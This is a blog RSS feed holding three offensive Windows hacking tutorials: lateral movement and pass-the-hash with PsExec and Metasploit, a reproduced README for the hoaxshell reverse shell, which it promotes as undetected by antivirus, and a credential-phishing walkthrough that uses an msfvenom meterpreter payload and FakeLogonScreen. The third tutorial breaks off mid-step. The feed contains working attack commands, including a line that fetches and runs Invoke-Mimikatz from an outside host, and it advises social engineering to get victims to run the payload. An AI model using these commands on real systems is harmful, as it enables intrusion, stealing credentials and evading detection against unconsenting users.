<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>windows Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/windows/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/windows/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Wed, 21 Feb 2024 23:26:36 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>windows Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/windows/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Windows Red Team Lateral Movement With PsExec</title>
		<link>http://kostacipo.stream/windows-red-team-lateral-movement-with-psexec/</link>
					<comments>http://kostacipo.stream/windows-red-team-lateral-movement-with-psexec/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 23:26:36 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[lateral movement]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2173</guid>

					<description><![CDATA[<p>How to perform Lateral movement on Windows targets Prerequisites &#38; Requirements In order to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions: Kali Linux Parrot OS The following is a list of recommended technical prerequisites that you will need in [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/windows-red-team-lateral-movement-with-psexec/">Windows Red Team Lateral Movement With PsExec</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2 class="entry-subtitle g1-gamma g1-gamma-3rd">How to perform Lateral movement on Windows targets</h2>
<h1>Prerequisites &amp; Requirements</h1>
<p>In order to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions:</p>
<ul>
<li aria-level="1">Kali Linux</li>
<li aria-level="1">Parrot OS</li>
</ul>
<p>The following is a list of recommended technical prerequisites that you will need in order to get the most out of this technique:</p>
<ul>
<li aria-level="1">Familiarity with Linux system administration.</li>
<li aria-level="1">Familiarity with Windows.</li>
<li aria-level="1">Functional knowledge of TCP/IP.</li>
<li aria-level="1">Familiarity with penetration testing concepts and life-cycle.</li>
</ul>
<p><b>Note: The techniques and tools utilized in this document were performed on Kali Linux Virtual Machine </b></p>
<h1>MITRE ATT&amp;CK Lateral Movement Techniques</h1>
<p>Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.</p>
<p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-3546 lazyloaded" src="https://hackersploit.org/wp-content/uploads/2023/02/image5-4.png" alt="" width="562" height="629" data-expand="600" data-src="https://hackersploit.org/wp-content/uploads/2023/02/image5-4.png" /></p>
<p>The following is a list of key techniques and sub-techniques that we will be exploring:</p>
<ol>
<li aria-level="1">Remote Services</li>
<li aria-level="1">Alternate Authentication</li>
</ol>
<p>Our objective is to utilize clear-text passwords and hashes that we extracted to facilitate lateral movement through legitimate authentication protocols/methods.</p>
<h1>Lateral Movement With PsExec</h1>
<p>PsExec is a lightweight telnet replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec’s most powerful uses include launching interactive command prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems.</p>
<p>We can use the PsExec utility to authenticate with the target system legitimately and run arbitrary commands or launch a remote command prompt.</p>
<p>We will be running PsExec from our Windows VM as you may encounter a few issues when running PsExec on Linux with Wine.</p>
<p>Note: We will be utilizing the credentials we extracted from the Windows 10 target system in the Credential Access Video.</p>
<p>You can download PsExec from the following link: <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec">https://docs.microsoft.com/en-us/sysinternals/downloads/psexec</a></p>
<p>After downloading PsTools archive, you will need to extract it and open a Windows command prompt in the extracted folder.</p>
<p>We can execute a command on the target system with PsExec by specifying the computer name/IP address, username, and password. This can be done by running the following command:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">./PsExec64.exe \\&lt;TARGET-IP&gt; -u Administrator -p &lt;PASSWORD&gt; ipconfig</pre>
</div>
</div>
<p>In this case, we will execute the ipconfig command on the target system in order to verify that we can authenticate successfully with PsExec.</p>
<p><img decoding="async" class="alignnone size-full wp-image-3544 lazyloaded" src="https://hackersploit.org/wp-content/uploads/2023/02/image3-4.png" alt="" width="1202" height="478" data-expand="600" data-src="https://hackersploit.org/wp-content/uploads/2023/02/image3-4.png" /></p>
<p>As highlighted in the preceding screenshot, PsExec authenticates with the target system, executes the ipconfig, and provides us with the output of the command.</p>
<p>Alternatively, we can also initiate a remote command prompt session with the target system by running the following command:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">./PsExec64.exe \\&lt;TARGET-IP&gt; -u Administrator -p &lt;PASSWORD&gt; cmd.exe</pre>
</div>
</div>
<p>As highlighted in the following screenshot, we are able to authenticate successfully and obtain a remote command shell session on the target system.</p>
<p><img decoding="async" class="alignnone size-full wp-image-3543 lazyloaded" src="https://hackersploit.org/wp-content/uploads/2023/02/image2-4.png" alt="" width="1199" height="361" data-expand="600" data-src="https://hackersploit.org/wp-content/uploads/2023/02/image2-4.png" /></p>
<p>We can now utilize the remote command session to scan and ping for other hosts on the network that we can pivot to.</p>
<h1>Pass-the-Hash With PsExec</h1>
<p>If you weren’t able to extract any cleartext passwords from the target system, you can utilize the pass-the-hash Metasploit module that leverages PsExec in order to authenticate with SMB (Server Message Block) using a user account’s NTLM hash.</p>
<p>Pass-the-hash is a technique that is used by attackers to authenticate to a remote host by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password.</p>
<p>For this section, our target system will be running Windows 10. As a prerequisite, ensure that you have gained your initial foothold on the system and have a meterpreter session</p>
<p>The first step will involve loading the SMB PsExec Metasploit module, this can be done by running the following command on the Kali terminal:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">msf&gt; use exploit/windows/smb/psexec</pre>
</div>
</div>
<p>After loading the module, you will need to configure the module payload, this can be done by running the following command:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">msf&gt; set payload windows/x64/meterpreter/reverse_tcp</pre>
</div>
</div>
<p>You will also need to set the SMBPass and SMBUser options with the NTLM hash and name of the user account. This can be done by running the following commands:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">msf&gt; set SMBUser &lt;USERNAME&gt;</pre>
</div>
</div>
<p><em>Note: In this case, we will be setting the “SMBUser” option to “Administrator”.</em></p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">msf&gt; set SMBPass &lt;NTLM Hash&gt;</pre>
</div>
</div>
<p>Finally, you will need to set the target system IP address, this can be done by running the following command:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">msf&gt; set RHOSTS &lt;TARGET-IP&gt;</pre>
</div>
</div>
<p>After configuring the options, we can execute the module by running the following command:</p>
<div class="showyourterms dark nostatusbar" data-title="Terminal">
<div>
<pre class="line" data-line="0">msf&gt; run</pre>
</div>
</div>
<p>If authentication is successful, you should receive a new meterpreter session with the privileges of the user you authenticated with as shown in the screenshot below.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3545 lazyloaded" src="https://hackersploit.org/wp-content/uploads/2023/02/image4-4.png" alt="" width="1403" height="421" data-expand="600" data-src="https://hackersploit.org/wp-content/uploads/2023/02/image4-4.png" /></p>
<p>The post <a href="http://kostacipo.stream/windows-red-team-lateral-movement-with-psexec/">Windows Red Team Lateral Movement With PsExec</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/windows-red-team-lateral-movement-with-psexec/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>hoaxshell &#8211; An unconventional Windows reverse shell</title>
		<link>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/</link>
					<comments>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:15:12 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[reverse shell]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2139</guid>

					<description><![CDATA[<p>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. Purpose hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>Currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic.</h3>
<h2 dir="auto"><strong>Purpose</strong></h2>
<p dir="auto">hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it supports encryption (ssl).</p>
<p dir="auto">So far, it has been tested on fully updated <strong>Windows 11 Enterprise</strong> and <strong>Windows 10 Pro</strong> boxes (see video and screenshots).</p>
<p dir="auto">More: <a href="https://github.com/t3l3machus/hoaxshell" target="_blank" rel="noopener">https://github.com/t3l3machus/hoaxshell</a></p>
<h3 dir="auto"><a id="user-content-video-presentation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#video-presentation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Video Presentation</strong></h3>
<p dir="auto"><iframe loading="lazy" src="//www.youtube.com/embed/SEufgD5UxdU" width="560" height="314" allowfullscreen="allowfullscreen"></iframe></p>
<h2 dir="auto"><a id="user-content-screenshots" class="anchor" href="https://github.com/t3l3machus/hoaxshell#screenshots" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Screenshots </strong></h2>
<p><a href="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-242868" src="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png" sizes="auto, (max-width: 841px) 100vw, 841px" srcset="https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67.png 841w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-460x418.png 460w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-768x698.png 768w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-500x454.png 500w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-200x182.png 200w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-378x343.png 378w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-565x513.png 565w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-120x109.png 120w, https://hakin9.org/wp-content/uploads/2022/08/68747470733a2f2f7261772e6769746875622e636f6d2f74336c336d61636875732f686f61787368656c6c2f6d61737465722f73637265656e73686f74732f686f61787368656c6c2d77696e31312d76322e706e67-310x282.png 310w" alt="" width="841" height="764" /></a></p>
<p dir="auto">Find more screenshots <a href="https://github.com/t3l3machus/hoaxshell/blob/main/screenshots" target="_blank" rel="noopener">here</a>.</p>
<h2 dir="auto"><a id="user-content-installation" class="anchor" href="https://github.com/t3l3machus/hoaxshell#installation" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Installation</strong></h2>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
</code></pre>
<h2 dir="auto"><a id="user-content-usage" class="anchor" href="https://github.com/t3l3machus/hoaxshell#usage" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Usage</strong></h2>
<p dir="auto"><strong>Important</strong>: As a means of avoiding detection, hoaxshell is automatically generating random values for the session id, URL paths and name of a custom HTTP header utilized in the process, every time the script is started. The generated payload will work only for the instance it was generated for. Use the <code>-g</code> option to bypass this behavior and re-establish an active session or reuse a past generated payload with a new instance of hoaxshell.</p>
<h3 dir="auto"><a id="user-content-basic-shell-session-over-http" class="anchor" href="https://github.com/t3l3machus/hoaxshell#basic-shell-session-over-http" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Basic shell session over HTTP</strong></h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt;
</code></pre>
<p dir="auto">When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject into the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the &#8220;rawpayload&#8221; prompt command or start hoaxshell with the <code>-r</code> argument. After the payload has been executed on the victim, you&#8217;ll be able to run PowerShell commands against it.</p>
<h3 dir="auto"><a id="user-content-encrypted-shell-session-https" class="anchor" href="https://github.com/t3l3machus/hoaxshell#encrypted-shell-session-https" target="_blank" rel="noopener" aria-hidden="true"></a>Encrypted shell session (HTTPS):</h3>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s &lt;your_ip&gt; -c &lt;/path/to/cert.pem&gt; -k &lt;path/to/key.pem&gt;

</code></pre>
<p dir="auto">The generated PowerShell payload will be longer in length because of an additional block of code that disables the SSL certificate validation.</p>
<h3 dir="auto"><a id="user-content-grab-session-mode" class="anchor" href="https://github.com/t3l3machus/hoaxshell#grab-session-mode" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Grab session mode</strong></h3>
<p dir="auto">In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>sudo python3 hoaxshell.py -s &lt;your_ip&gt; -g
</code></pre>
<p dir="auto"><strong>Important</strong>: Make sure to start hoaxshell with the same settings as the session you are trying to restore (HTTP/HTTPS, port, etc).</p>
<h2 dir="auto"><a id="user-content-limitations" class="anchor" href="https://github.com/t3l3machus/hoaxshell#limitations" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Limitations</strong></h2>
<p dir="auto">The shell is going to hang if you execute a command that initiates an interactive session. Example:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code># this command will execute succesfully and you will have no problem: 
&gt; powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
&gt; powershell

# In the same manner, you won't have a problem executing this:
&gt; cmd /c dir /a

# But this will cause your hoaxshell to hang:
&gt; cmd.exe
</code></pre>
<p dir="auto">So, if you for example would like to run mimikatz through hoaxshell you would need to invoke the commands:</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>hoaxshell &gt; IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'
</code></pre>
<p dir="auto">Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell PowerShell context.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/">hoaxshell &#8211; An unconventional Windows reverse shell</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hoaxshell-an-unconventional-windows-reverse-shell/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 27 Oct 2020 19:57:56 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1835</guid>

					<description><![CDATA[<p>This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial. I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/">How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial.</p>
<p>I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.</p>
<p><a href="https://twitter.com/bitsadmin">Arris Huijgen</a> developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.</p>
<h2>Steps to Hack Windows 10 Password</h2>
<p>Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP: 192.168.0.103, and the Windows (target machine) got 192.168.0.100.</p>
<h3>Download the FakeLogonScreen in Kali Linux</h3>
<p>First, we need to download the FakeLogonScreen executable in our attacking machine from the link:</p>
<p><a href="https://github.com/bitsadmin/fakelogonscreen/releases"><em>https://github.com/bitsadmin/fakelogonscreen/releases</em></a></p>
<p>Now assume the target machine is connected to the same network as the attacking machine.</p>
<h2>Creating the Malicious Payload to Hack Windows</h2>
<p>We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e. 192.168.0.103, and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:</p>
<p><strong># msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe &gt;&gt; payload.exe</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7606 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png" sizes="auto, (max-width: 630px) 100vw, 630px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png 630w, https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-300x75.png 300w" alt="Creating the Malicious Payload to Hack Windows" width="630" height="158">Here the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.</p>
<p><strong>#python -m SimpleHTTPServer 80</strong></p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7607 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2-300x31.png 300w" alt="Creating the Malicious Payload to Hack Windows 2" width="629" height="64"></p>
<h2>Download the Payload on Target Machine</h2>
<p>All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.</p>
<p>For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7608 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png" sizes="auto, (max-width: 893px) 100vw, 893px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png 893w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-300x178.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-768x456.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-696x413.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-708x420.png 708w" alt="Download the Payload on Target Machine" width="893" height="530"></p>
<p>This will also be showing the current logs in our Kali machine.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7609 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png" sizes="auto, (max-width: 622px) 100vw, 622px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png 622w, https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine-300x45.png 300w" alt="Kali machine" width="622" height="93"></p>
<h2>Launch Metasploit to Exploit</h2>
<p>Let’s get straight back to Kali and launch Metasploit-framework.</p>
<p>Use multi/handler module.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7610 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png" sizes="auto, (max-width: 633px) 100vw, 633px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png 633w, https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module.-300x30.png 300w" alt="Use multi/handler module." width="633" height="64">Set the windows/meterpreter/reverse_tcp payload.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7611 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload.-300x30.png 300w" alt="Set the windows meterpreter reverse_tcp payload." width="629" height="63">Set lhost as our IP i.e. 192.168.0.103 and lport as 4444</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7612 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png" sizes="auto, (max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png 632w, https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444-300x46.png 300w" alt="Set lhost as our IP i.e. 192.168.0.103 and lport as 4444" width="632" height="96">After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.</p>
<p><strong> <img loading="lazy" decoding="async" class="aligncenter wp-image-7613 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png" sizes="auto, (max-width: 621px) 100vw, 621px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png 621w, https://www.ehacking.net/wp-content/uploads/2020/07/exploit-300x83.png 300w" alt="exploit" width="621" height="172"></strong></p>
<h2>Upload the Executable</h2>
<p>Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.</p>
<p><strong>&gt;upload /root/Downloads/FakeLogonScreen.exe</strong></p>
<p>After that, get the shell access and run FakeLogonScreen.exe as showing below:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7615 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png" sizes="auto, (max-width: 890px) 100vw, 890px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png 890w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-300x105.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-768x269.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-696x244.png 696w" alt="FakeLogon" width="890" height="312">And BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7616 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png" sizes="auto, (max-width: 1015px) 100vw, 1015px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png 1015w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-300x226.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-768x577.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-696x523.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-559x420.png 559w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-265x198.png 265w" alt="target machine" width="1015" height="763"></p>
<p>To check the strength of this&nbsp;tool, we will be entering the wrong password.</p>
